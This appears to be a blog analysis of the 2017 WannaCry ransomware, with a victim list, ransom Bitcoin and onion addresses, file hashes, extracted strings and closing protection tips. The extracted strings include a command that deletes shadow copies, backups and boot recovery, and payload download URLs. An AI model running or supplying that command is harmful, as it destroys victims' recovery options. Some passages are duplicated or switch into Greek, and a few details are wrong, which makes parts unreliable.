WannaDecrypt0r - Full analysis of the NSA's super-trick

Friday 12 May 2017. Perhaps the largest and most severe ransomware attack is a fact.

The attack was carried out with the malware type "Crypto- Malware", which can affect all versions of operating systems and is spread mainly through emails. The malware encrypts digital files and data on computers, which are released after payment of money as a "ransom".

The attacks started in Britain, but quickly the ransomware malware spread across the globe, infecting files, and cannot be treated unless the "e-patient" pays a sum of money in bitcoin.

Which systems were affected? All previous versions of Windows 10 and those not upgraded with the MS-17-010 security update.

The website that served the purposes of the ransomware was the

www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com. The domain in question has already been closed down.

So far 99 countries have been infected and over 100,000 attacks have been recorded, with the majority occurring in Russia, Ukraine and Taiwan, while several incidents have also been reported in Europe.

Greece, and specifically the e-government centre of the Aristotle University of Thessaloniki, fell victim to the hackers, but thanks to the immediate intervention of the competent authorities, the spread of the phenomenon was prevented.

From our investigations, the virus has infected a large number of government infrastructures and very large private companies.

Here is the list of WannaCrypt victims:

A) Britain's National Health Service including almost all of its hospitals, such as:

1 Mid Essex Clinical Commissioning Group

2 Wingate Medical Centre

3 NHS Liverpool Community Health NHS Trust

4 East Lancashire Hospitals NHS Trust

5 George Eliot Hospital NHS Trust in Nuneaton, Warwickshire

6 Blackpool Teaching Hospitals NHS Trust

7 St Barts Health NHS Trust

8 Derbyshire Community Health Services

9 East and North Hertfordshire Clinical Commissioning Group

10 East and North Hertfordshire Hospitals NHS Trust

11 Sherwood Forest NHS Trust

12 Nottinghamshire Healthcare

13 Burton Hospitals NHS Foundation Trust

14 United Lincolnshire Hospitals NHS Trust

15 Colchester General Hospital

16 Cheshire and Wirral Partnership NHS Foundation Trust

17 Northern Lincolnshire and Goole NHS Foundation Trust

18 North Staffordshire Combined Healthcare NHS Trust

19 Cumbria Partnership NHS Foundation Trust

20 Morecombe Bay NHS Trust

21 University Hospitals of North Midlands NHS Trust

22 NHS Hampshire Hospitals

23 Kent Community Health NHS Foundation Trust

24 Plymouth Hospitals NHS Trust

Β) Nissan (UK)

C) Telefonica (SPAIN)

D) Power Firm Iberdrola and Gas Natural (SPAIN)

E) FedEx (US)

F) University of Waterloo (US)

G) Russia interior ministry & Megafon (RUSSIA)

H) VTB (RUSSIAN BANK)

I) Russian Railroads (RZD)

J) Portugal Telecom

K) Сбербанк – Sberbank Russia (RUSSIA)

L) Shaheen Airlines (INDIA)

M) Train Station in Frankfurt

N) Neustadt Station (GERMANY)

O) The entire network of German Rail seems to be affected

P) In China secondary schools and universities had been affected

Q) A Library in Oman

R) China Yanshui County Public Security Bureau

S) Renault (FRANCE)

T) Schools/Education (FRANCE)

U) University of Milano-Bicocca (ITALY)

V) A mall in Singapore

W) ATMs in China

X) Norwegian soccer team ticket sales

This ransomware can be translated depending on the country that has been hit and the ransom message has the corresponding language.

All the messages for each country can be downloaded here: https://transfer.sh/y6qco/WANNACRYDECRYPTOR-Ransomware-Messages-all-langs.zip

Indicatively, we mention the following: m_bulgarian, m_chinese (simplified), m_chinese (traditional), m_croatian, m_czech, m_danish, m_dutch, m_english, m_filipino, m_finnish, m_french, m_german, m_greek, m_indonesian, m_italian, m_japanese, m_korean, m_latvian, m_norwegian, m_polish, m_portuguese, m_romanian, m_russian, m_slovak, m_spanish, m_swedish, m_turkish, m_vietnamese

The malware "WannaCry", which is one of the digital threats of the "Crypto-Malware" type and can affect all operating system versions, has made its appearance in Greece, with the Directorate of Cybercrime of the Hellenic Police noting in a statement that the malware infects computers in two main ways: Through infected emails containing malicious attachments and through insecure or infected websites.

In particular, as regards infected files, these are usually .docx and .pdf files, which have malicious macros embedded in them, which are executed when they are opened and install the malware on the PC.

The virus infects almost all types of files that we may have on our personal and corporate computers and these are:

.doc, .docx, .xls, .xlsx, .ppt, .pptx, .pst, .ost, .msg, .eml, .vsd, .vsdx, .txt, .csv, .rtf, .123, .wks, .wk1, .pdf, .dwg, .onetoc2, .snt, .jpeg, .jpg, .docb, .docm, .dot, .dotm, .dotx, .xlsm, .xlsb, .xlw, .xlt, .xlm, .xlc, .xltx, .xltm, .pptm, .pot, .pps, .ppsm, .ppsx, .ppam, .potx, .potm, .edb, .hwp, .602, .sxi, .sti, .sldx, .sldm, .sldm, .vdi, .vmdk, .vmx, .gpg, .aes, .ARC, .PAQ, .bz2, .tbk, .bak, .tar, .tgz, .gz, .7z, .rar, .zip, .backup, .iso, .vcd, .bmp, .png, .gif, .raw, .cgm, .tif, .tiff, .nef, .psd, .ai, .svg, .djvu, .m4u, .m3u, .mid, .wma, .flv, .3g2, .mkv, .3gp, .mp4, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .mp3, .sh, .class, .jar, .java, .rb, .asp, .php, .jsp, .brd, .sch, .dch, .dip, .pl, .vb, .vbs, .ps1, .bat, .cmd, .js, .asm, .h, .pas, .cpp, .c, .cs, .suo, .sln, .ldf, .mdf, .ibd, .myi, .myd, .frm, .odb, .dbf, .db, .mdb, .accdb, .sql, .sqlitedb, .sqlite3, .asc, .lay6, .lay, .mml, .sxm, .otg, .odg, .uop, .std, .sxd, .otp, .odp, .wb2, .slk, .dif, .stc, .sxc, .ots, .ods, .3dm, .max, .3ds, .uot, .stw, .sxw, .ott, .odt, .pem, .p12, .csr, .crt, .key, .pfx, .der.

WannaDecrypt0r - Full analysis of the NSA's super-trick

The virus infects almost all types of files that we may have on our personal and corporate computers and these are:

In addition, this malware has the ability to propagate itself over the local network and encrypt the files of any system it accesses. This capability makes it extremely dangerous in corporate networks where propagation can be rapid.

The malware has been circulating since 12-05-2017 and has so far infected more than 125,000 computers worldwide.

For the payment of the ransom we have identified 3 Bitcoin addresses and they are:

Α) https://blockchain.info/address/13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Β) https://blockchain.info/address/12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

C) https://blockchain.info/address/115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Οι ερευνητές της Audax Cybersecurity ανακάλυψαν εκτός από τις 5 διευθύνσεις TOR που ξεκίνησε το υπερ-όπλο της NSA ακόμα 2. Οι εν λόγω διευθύνσεις (URLS) δεν υφίστανται πλέον. Αναλυτικά οι διευθύνσεις είναι:

Α) gx7ekbenv2riucmf.onion

B) 57g7spgrzlojinas.onion

C) xxlvbrloxvriy2c5.onion

D) 76jdd2ir2embyv47.onion

E) cwwnhwhlz52maqm7.onion

F) daijoadjedwiedhdoa4.onion

G) 93e9sdhaudhjakdja.onion

VIDEO : Watch a video on how to infect a computer system with Windows XP installed.

Technical Analysis:

md5: 509C41EC97BB81B0567B059AA2F50FE8

Holds Resource .zip:
MD5: 5b225149abb8c8eb245445f707e6f0d2
Pass: WNcry@2ol7

Contains
b.wnry c17170262312f3be7027bc2ca825bf0c
c.wnry ae08f79a0d800b82fcbe1b43cdbdbefc
r.wnry 3e0020fc529b1c2a061016dd2469ba96
t.wnry 5dcaac857e695a65f5c3ef1441a73a8f
taskdl.exe 4fef5e34143e646dbf9907c4374276f5
taskse.exe 8495400f199ac77853c53b5a3f278f3e
u.wnry 7bf2b57f2a205768755c07f238fb32cc
m_bulgarian.wnry 95673b0f968c0f55b32204361940d184
m_chinese (simplified).wnry 0252d45ca21c8e43c9742285c48e91ad
m_chinese (traditional).wnry 2efc3690d67cd073a9406a25005f7cea
m_croatian.wnry 17194003fa70ce477326ce2f6deeb270
m_czech.wnry 537efeecdfa94cc421e58fd82a58ba9e
m_danish.wnry 2c5a3b81d5c4715b7bea01033367fcb5
m_dutch.wnry 7a8d499407c6a647c03c4471a67eaad7
m_english.wnry fe68c2dc0d2419b38f44d83f2fcf232e
m_filipino.wnry 08b9e69b57e4c9b966664f8e1c27ab09
m_finnish.wnry 35c2f97eea8819b1caebd23fee732d8f
m_german.wnry 3d59bbb5553fe03a89f817819540f469
m_greek.wnry fb4e8718fea95bb7479727fde80cb424
m_indonesian.wnry 3788f91c694dfc48e12417ce93356b0f
m_italian.wnry 30a200f78498990095b36f574b6e8690
m_japanese.wnry b77e1221f7ecd0b5d696cb66cda1609e
m_korean.wnry 6735cb43fe44832b061eeb3f5956b099
m_latvian.wnry c33afb4ecc04ee1bcc6975bea49abe40
m_norwegian.wnry ff70cc7c00951084175d12128ce02399
m_polish.wnry e79d7f2833a9c2e2553c7fe04a1b63f4
m_portuguese.wnry fa948f7d8dfb21ceddd6794f2d56b44f
m_romanian.wnry 313e0ececd24f4fa1504118a11bc7986
m_russian.wnry 452615db2336d60af7e2057481e4cab5
m_slovak.wnry c911aba4ab1da6c28cf86338ab2ab6cc
m_spanish.wnry 8d61648d34cba8ae9d1e2a219019add1
m_swedish.wnry c7a19984eb9f37198652eaf2fd1ee25c
m_turkish.wnry 531ba6b1a5460fc9446946f91cc8c94b
m_vietnamese.wnry 8419be28a0dcec3f55823620922b00fa

Onions :
gx7ekbenv2riucmf.onion
57g7spgrzlojinas.onion
xxlvbrloxvriy2c5.onion
76jdd2ir2embyv47.onion
cwwnhwhlz52maqm7.onion
Script from memory :
0x1000d628, 218, @echo off
echo SET ow = WScript.CreateObject(“WScript.Shell”)> m.vbs
echo SET om = ow.CreateShortcut(“%s%s”)>> m.vbs
echo om.TargetPath = “%s%s”>> m.vbs
echo om.Save>> m.vbs
cscript.exe //nologo m.vbs
del m.vbs
u.wnry :

.data:00420FD8 aCVssadminDelet db ‘/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet’
aFailedToSendYo db ‘Failed to send your message!’,0Ah
.data:00421318 ; char aYourMessageHas[]
.data:00421318 aYourMessageHas db ‘Your message has been sent successfully!’,0
.data:00421344 ; char aYouAreSendingT[]
.data:00421344 aYouAreSendingT db ‘You are sending too many mails! Please try again %d minutes later’

Process:
00:34 < nulldot> 0x1000ef48, 24, BAYEGANSRV\administrator
00:34 < nulldot> 0x1000ef7a, 13, Smile465666SA
00:34 < nulldot> 0x1000efc0, 19, wanna18@hotmail.com
00:34 < nulldot> 0x1000eff2, 34, 1QAc9S5EmycqjzzWDc1yiWzr9jJLC8sLiY
00:34 < nulldot> 0x1000f024, 22, sqjolphimrr7jqw6.onion
00:34 < nulldot> 0x1000f088, 52, https://www.dropbox.com/s/deh8s52zazlyy94/t.zip?dl=1
00:34 < nulldot> 0x1000f0ec, 67, https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
00:34 < nulldot> 0x1000f150, 52, https://www.dropbox.com/s/c1gn29iy8erh1ks/m.rar?dl=1
00:34 < nulldot> 0x1000f1b4, 12, 00000000.eky
00:34 < nulldot> 0x1000f270, 12, 00000000.pky
00:34 < nulldot> 0x1000f2a4, 12, 00000000.res

Target_Files:
data:1000D1F8 aCryptacquireco db ‘CryptAcquireContextA’,0 ; DATA XREF: sub_10004440+2Do
.data:1000D20D align 10h
.data:1000D210 dd offset a_doc ; “.doc”
.data:1000D214 dd offset a_docx ; “.docx”
.data:1000D218 dd offset a_xls ; “.xls”
.data:1000D21C dd offset a_xlsx ; “.xlsx”
.data:1000D220 dd offset a_ppt ; “.ppt”
.data:1000D224 dd offset a_pptx ; “.pptx”
.data:1000D228 dd offset a_pst ; “.pst”
.data:1000D22C dd offset a_ost ; “.ost”
.data:1000D230 dd offset a_msg ; “.msg”
.data:1000D234 dd offset a_eml ; “.eml”
.data:1000D238 dd offset a_vsd ; “.vsd”
.data:1000D23C dd offset a_vsdx ; “.vsdx”
.data:1000D240 dd offset a_txt ; “.txt”
.data:1000D244 dd offset a_csv ; “.csv”
.data:1000D248 dd offset a_rtf ; “.rtf”
.data:1000D24C dd offset a_123 ; “.123”
.data:1000D250 dd offset a_wks ; “.wks”
.data:1000D254 dd offset a_wk1 ; “.wk1”
.data:1000D258 dd offset a_pdf ; “.pdf”
.data:1000D25C dd offset a_dwg ; “.dwg”
.data:1000D260 dd offset a_onetoc2 ; “.onetoc2”
.data:1000D264 dd offset a_snt ; “.snt”
.data:1000D268 dd offset a_jpeg ; “.jpeg”
.data:1000D26C dd offset a_jpg ; “.jpg”
.data:1000D274 dd offset a_docb ; “.docb”
.data:1000D278 dd offset a_docm ; “.docm”
.data:1000D27C dd offset a_dot ; “.dot”
.data:1000D280 dd offset a_dotm ; “.dotm”
.data:1000D284 dd offset a_dotx ; “.dotx”
.data:1000D288 dd offset a_xlsm ; “.xlsm”
.data:1000D28C dd offset a_xlsb ; “.xlsb”
.data:1000D290 dd offset a_xlw ; “.xlw”
.data:1000D294 dd offset a_xlt ; “.xlt”
.data:1000D298 dd offset a_xlm ; “.xlm”
.data:1000D29C dd offset a_xlc ; “.xlc”
.data:1000D2A0 dd offset a_xltx ; “.xltx”
.data:1000D2A4 dd offset a_xltm ; “.xltm”
.data:1000D2A8 dd offset a_pptm ; “.pptm”
.data:1000D2AC dd offset a_pot ; “.pot”
.data:1000D2B0 dd offset a_pps ; “.pps”
.data:1000D2B4 dd offset a_ppsm ; “.ppsm”
.data:1000D2B8 dd offset a_ppsx ; “.ppsx”
.data:1000D2BC dd offset a_ppam ; “.ppam”
.data:1000D2C0 dd offset a_potx ; “.potx”
.data:1000D2C4 dd offset a_potm ; “.potm”
.data:1000D2C8 dd offset a_edb ; “.edb”
.data:1000D2CC dd offset a_hwp ; “.hwp”
.data:1000D2D0 dd offset a_602 ; “.602”
.data:1000D2D4 dd offset a_sxi ; “.sxi”
.data:1000D2D8 dd offset a_sti ; “.sti”
.data:1000D2DC dd offset a_sldx ; “.sldx”
.data:1000D2E0 dd offset a_sldm ; “.sldm”
.data:1000D2E4 dd offset a_sldm ; “.sldm”
.data:1000D2E8 dd offset a_vdi ; “.vdi”
.data:1000D2EC dd offset a_vmdk ; “.vmdk”
.data:1000D2F0 dd offset a_vmx ; “.vmx”
.data:1000D2F4 dd offset a_gpg ; “.gpg”
.data:1000D2F8 dd offset a_aes ; “.aes”
.data:1000D2FC dd offset a_arc ; “.ARC”
.data:1000D300 dd offset a_paq ; “.PAQ”
.data:1000D304 dd offset a_bz2 ; “.bz2”
.data:1000D308 dd offset a_tbk ; “.tbk”
.data:1000D30C dd offset a_bak ; “.bak”
.data:1000D310 dd offset a_tar ; “.tar”
.data:1000D314 dd offset a_tgz ; “.tgz”
.data:1000D318 dd offset a_gz ; “.gz”
.data:1000D31C dd offset a_7z ; “.7z”
.data:1000D320 dd offset a_rar ; “.rar”
.data:1000D324 dd offset a_zip ; “.zip”
.data:1000D328 dd offset a_backup ; “.backup”
.data:1000D32C dd offset a_iso ; “.iso”
.data:1000D330 dd offset a_vcd ; “.vcd”
.data:1000D334 dd offset a_bmp ; “.bmp”
.data:1000D338 dd offset a_png ; “.png”
.data:1000D33C dd offset a_gif ; “.gif”
.data:1000D340 dd offset a_raw ; “.raw”
.data:1000D344 dd offset a_cgm ; “.cgm”
.data:1000D348 dd offset a_tif ; “.tif”
.data:1000D34C dd offset a_tiff ; “.tiff”
.data:1000D350 dd offset a_nef ; “.nef”
.data:1000D354 dd offset a_psd ; “.psd”
.data:1000D358 dd offset a_ai ; “.ai”
.data:1000D35C dd offset a_svg ; “.svg”
.data:1000D360 dd offset a_djvu ; “.djvu”
.data:1000D364 dd offset a_m4u ; “.m4u”
.data:1000D368 dd offset a_m3u ; “.m3u”
.data:1000D36C dd offset a_mid ; “.mid”
.data:1000D370 dd offset a_wma ; “.wma”
.data:1000D374 dd offset a_flv ; “.flv”
.data:1000D378 dd offset a_3g2 ; “.3g2”
.data:1000D37C dd offset a_mkv ; “.mkv”
.data:1000D380 dd offset a_3gp ; “.3gp”
.data:1000D384 dd offset a_mp4 ; “.mp4”
.data:1000D388 dd offset a_mov ; “.mov”
.data:1000D38C dd offset a_avi ; “.avi”
.data:1000D390 dd offset a_asf ; “.asf”
.data:1000D394 dd offset a_mpeg ; “.mpeg”
.data:1000D398 dd offset a_vob ; “.vob”
.data:1000D39C dd offset a_mpg ; “.mpg”
.data:1000D3A0 dd offset a_wmv ; “.wmv”
.data:1000D3A4 dd offset a_fla ; “.fla”
.data:1000D3A8 dd offset a_swf ; “.swf”
.data:1000D3AC dd offset a_wav ; “.wav”
.data:1000D3B0 dd offset a_mp3 ; “.mp3”
.data:1000D3B4 dd offset a_sh ; “.sh”
.data:1000D3B8 dd offset a_class ; “.class”
.data:1000D3BC dd offset a_jar ; “.jar”
.data:1000D3C0 dd offset a_java ; “.java”
.data:1000D3C4 dd offset a_rb ; “.rb”
.data:1000D3C8 dd offset a_asp ; “.asp”
.data:1000D3CC dd offset a_php ; “.php”
.data:1000D3D0 dd offset a_jsp ; “.jsp”
.data:1000D3D4 dd offset a_brd ; “.brd”
.data:1000D3D8 dd offset a_sch ; “.sch”
.data:1000D3DC dd offset a_dch ; “.dch”
.data:1000D3E0 dd offset a_dip ; “.dip”
.data:1000D3E4 dd offset a_pl ; “.pl”
.data:1000D3E8 dd offset a_vb ; “.vb”
.data:1000D3EC dd offset a_vbs ; “.vbs”
.data:1000D3F0 dd offset a_ps1 ; “.ps1”
.data:1000D3F4 dd offset a_bat ; “.bat”
.data:1000D3F8 dd offset a_cmd ; “.cmd”
.data:1000D3FC dd offset a_js ; “.js”
.data:1000D400 dd offset a_asm ; “.asm”
.data:1000D404 dd offset a_h ; “.h”
.data:1000D408 dd offset a_pas ; “.pas”
.data:1000D40C dd offset a_cpp ; “.cpp”
.data:1000D410 dd offset a_c ; “.c”
.data:1000D414 dd offset a_cs ; “.cs”
.data:1000D418 dd offset a_suo ; “.suo”
.data:1000D41C dd offset a_sln ; “.sln”
.data:1000D420 dd offset a_ldf ; “.ldf”
.data:1000D424 dd offset a_mdf ; “.mdf”
.data:1000D428 dd offset a_ibd ; “.ibd”
.data:1000D42C dd offset a_myi ; “.myi”
.data:1000D430 dd offset a_myd ; “.myd”
.data:1000D434 dd offset a_frm ; “.frm”
.data:1000D438 dd offset a_odb ; “.odb”
.data:1000D43C dd offset a_dbf ; “.dbf”
.data:1000D440 dd offset a_db ; “.db”
.data:1000D444 dd offset a_mdb ; “.mdb”
.data:1000D448 dd offset a_accdb ; “.accdb”
.data:1000D44C dd offset a_sql ; “.sql”
.data:1000D450 dd offset a_sqlitedb ; “.sqlitedb”
.data:1000D454 dd offset a_sqlite3 ; “.sqlite3”
.data:1000D458 dd offset a_asc ; “.asc”
.data:1000D45C dd offset a_lay6 ; “.lay6”
.data:1000D460 dd offset a_lay ; “.lay”
.data:1000D464 dd offset a_mml ; “.mml”
.data:1000D468 dd offset a_sxm ; “.sxm”
.data:1000D46C dd offset a_otg ; “.otg”
.data:1000D470 dd offset a_odg ; “.odg”
.data:1000D474 dd offset a_uop ; “.uop”
.data:1000D478 dd offset a_std ; “.std”
.data:1000D47C dd offset a_sxd ; “.sxd”
.data:1000D480 dd offset a_otp ; “.otp”
.data:1000D484 dd offset a_odp ; “.odp”
.data:1000D488 dd offset a_wb2 ; “.wb2”
.data:1000D48C dd offset a_slk ; “.slk”
.data:1000D490 dd offset a_dif ; “.dif”
.data:1000D494 dd offset a_stc ; “.stc”
.data:1000D498 dd offset a_sxc ; “.sxc”
.data:1000D49C dd offset a_ots ; “.ots”
.data:1000D4A0 dd offset a_ods ; “.ods”
.data:1000D4A4 dd offset a_3dm ; “.3dm”
.data:1000D4A8 dd offset a_max ; “.max”
.data:1000D4AC dd offset a_3ds ; “.3ds”
.data:1000D4B0 dd offset a_uot ; “.uot”
.data:1000D4B4 dd offset a_stw ; “.stw”
.data:1000D4B8 dd offset a_sxw ; “.sxw”
.data:1000D4BC dd offset a_ott ; “.ott”
.data:1000D4C0 dd offset a_odt ; “.odt”
.data:1000D4C4 dd offset a_pem ; “.pem”
.data:1000D4C8 dd offset a_p12 ; “.p12”
.data:1000D4CC dd offset a_csr ; “.csr”
.data:1000D4D0 dd offset a_crt ; “.crt”
.data:1000D4D4 dd offset a_key ; “.key”
.data:1000D4D8 dd offset a_pfx ; “.pfx”
.data:1000D4DC dd offset a_der ; “.der”

Six (6) safety tips on how you can protect yourself:

1. Keep your system up to date.
2. Upgrade any old operating systems you may be using such as Windows XP, Vista, Server 2003 or 2008.
3. Adopt the use of a firewall.
4. Disable the SMB door.
5. Keep your Antivirus up to date.
6. Daily and encrypted backup.